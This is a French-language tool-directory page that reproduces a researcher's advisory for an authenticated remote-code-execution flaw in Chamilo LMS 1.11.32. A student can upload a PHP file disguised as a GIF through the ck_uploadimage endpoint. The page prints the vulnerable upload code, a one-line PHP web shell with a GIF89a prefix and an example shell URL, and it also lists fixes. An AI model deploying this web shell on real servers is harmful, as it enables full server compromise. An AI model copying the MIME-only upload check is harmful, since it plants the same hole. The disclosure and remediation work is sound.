Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-29041 — Salut, je suis K, c’est ma première CVE, qui est une vulnérabilité d’exécution de code à distance (RCE). C’est le début de mon parcours en tant que chercheur en sécurité. | Kitploit
Outils/GitHubGitHub/kx00007/cve-2026-29041
Analyse des VulnérabilitésExploitationExploitation d'Applications WebArticles et RechercheApprentissage et Éducation
GitHubkx00007/cve-2026-29041

CVE-2026-29041

Salut, je suis K, c’est ma première CVE, qui est une vulnérabilité d’exécution de code à distance (RCE). C’est le début de mon parcours en tant que chercheur en sécurité.

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-29041 — RCE authentifiée via téléchargement de fichier sans restriction dans Chamilo LMS 1.11.32

Exécution de code à distance authentifiée dans Chamilo LMS 1.11.32 via une validation inadéquate du téléchargement de fichiers dans le point de terminaison AJAX ck_uploadimage. Un étudiant disposant de faibles privilèges peut télécharger un shell web PHP déguisé en image, compromettant ainsi entièrement le serveur.


📋 Résumé de la vulnérabilité

ChampDétails
ProduitChamilo LMS
Version1.11.32 (Confirmée)
VulnérabilitéTéléchargement de fichier sans restriction avec type dangereux (CWE-434)
ImpactExécution de code à distance authentifiée (RCE)
CVSS v3.18.8 (ÉLEVÉE) — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Authentification requise✅ Oui — Rôle étudiant (faible privilège)
CWECWE-434 : Téléchargement sans restriction de fichier avec type dangereux
Découvert parMENG HOKSENG

🧠 Détails de la vulnérabilité

Point de terminaison concerné

root@kitploit:~
POST /main/inc/ajax/document.ajax.php?a=ck_uploadimage&cidReq=[COURSE_ID]

Fichier vulnérable : main/inc/ajax/document.ajax.php
Fonction vulnérable : ck_uploadimage

Analyse de la cause racine

Le gestionnaire de téléchargement effectue uniquement une validation du type MIME à l'aide de la fonction PHP mime_content_type(), qui inspecte les octets magiques du fichier (les premiers octets du contenu), et non l'extension du fichier.

root@kitploit:~
// Logique de validation vulnérable (simplifiée)
$mime = mime_content_type($_FILES['upload']['tmp_name']);

if (!mimeAccepted($mime, ['image'])) {
    die("Invalid file type");
}

// ❌ Aucune validation de l'extension
// ❌ Aucune assainissement du nom de fichier
move_uploaded_file($_FILES['upload']['tmp_name'], $uploadPath . $fileUploadName);

Deux faiblesses distinctes se combinent pour former une chaîne d'exploitation complète :

  1. Validation du type MIME uniquement — contournée en préfixant le code PHP avec des octets magiques d'image valides (GIF89a)
  2. Nom de fichier d'origine conservé — le serveur stocke le fichier en utilisant le nom de fichier contrôlé par l'attaquant, y compris l'extension .php, dans un répertoire accessible via le web

Technique de contournement

Un fichier malveillant est conçu comme suit :

root@kitploit:~
GIF89a;<?php system($_GET['cmd']); ?>
  • mime_content_type() lit GIF89a → le classe comme image/gif → passe la validation
  • move_uploaded_file() l'enregistre sous shell.php dans /app/upload/users/<id>/ → directement exécutable via le navigateur

💣 Preuve de concept

Exécutez l'exploit complet qui se connecte en tant qu'étudiant pour effectuer automatiquement le téléchargement du fichier image Après avoir exécuté l'exploit Python complet, nous pouvons trouver notre shell web téléchargé à l'adresse http://localhost:8081/app/upload/users/3/3/my_fileszhxoxgwj.php?cmd=id image

🛡️ Impact

L'exploitation réussie de cette vulnérabilité entraîne la compromission totale du serveur à partir d'un compte de niveau étudiant :

  • 🔴 Exécution de code à distance — commandes OS arbitraires via le shell web
  • 🔴 Exfiltration de données — accès complet aux identifiants de la base de données de l'application et aux fichiers
  • 🔴 Mouvement latéral — pivot vers le réseau interne depuis le serveur compromis
  • 🔴 Persistance — capacité à installer des portes dérobées dans les répertoires accessibles via le web
  • 🔴 Interruption de service — modification ou suppression du contenu des cours et des données utilisateur

Impact CIA : Perte complète de la confidentialité, de l'intégrité et de la disponibilité.


🔧 Correctifs

▪ Imposer une liste blanche stricte des extensions de fichiers Seules les extensions de fichiers image explicitement autorisées (par exemple, .jpg, .png, .gif) doivent être acceptées. Les fichiers téléchargés avec des extensions exécutables telles que .php, .phtml ou .phar doivent être rejetés quel que soit le type MIME.

▪ Ne pas se fier uniquement à la validation du type MIME Les contrôles du type MIME utilisant des fonctions telles que mime_content_type() ne doivent pas être utilisés comme contrôle de sécurité principal, car ils peuvent être contournés à l'aide d'en-têtes de fichiers falsifiés. La validation MIME ne doit être utilisée que comme contrôle secondaire.

▪ Stocker les fichiers téléchargés en dehors des répertoires accessibles via le web Le contenu téléchargé doit être stocké dans un répertoire qui n'est pas directement accessible via le serveur web. Si un accès public est requis, les fichiers doivent être servis via un gestionnaire contrôlé plutôt que par un accès direct.

📄 Références

  • Site officiel de Chamilo LMS
  • CWE-434 : Téléchargement sans restriction de fichier avec type dangereux
  • OWASP : Téléchargement de fichier sans restriction
  • Calculateur CVSS v3.1

👤 Auteur

MENG HOKSENG
Chercheur en sécurité indépendant


⚠️ Avertissement légal

Ce projet est publié uniquement à des fins éducatives et de recherche en sécurité autorisée. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet exploit. Obtenez toujours une autorisation écrite explicite avant d'effectuer des évaluations de sécurité.

Télécharger l’outil